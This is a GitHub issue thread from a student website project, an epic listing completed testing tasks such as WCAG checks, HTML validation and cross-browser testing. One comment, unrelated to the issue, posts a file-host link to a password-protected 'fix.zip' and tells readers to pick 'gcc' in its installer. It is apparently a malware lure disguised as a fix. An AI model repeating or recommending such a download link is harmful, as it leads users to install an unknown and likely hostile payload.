### ISSUE TITLE
EPIC 7: Testing

### ISSUE THREAD

**Issue by Jereriviel** [Jereriviel/semester-project-1#33]
This Epic is the seventh step in the process of making the website for the client. It contains the following tasks:

Test and review the site before launch:

- [x] [WCAG testing](https://github.com/Jereriviel/semester-project-1/issues/35)
- [x] [HTML validation](https://github.com/Jereriviel/semester-project-1/issues/34)
- [x] [Cross browser testing](https://github.com/Jereriviel/semester-project-1/issues/36)
- [x] [Mobile testing](https://github.com/Jereriviel/semester-project-1/issues/37)
- [x] [Peer review](https://github.com/Jereriviel/semester-project-1/issues/67)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jereriviel** [comment]
Testing done.
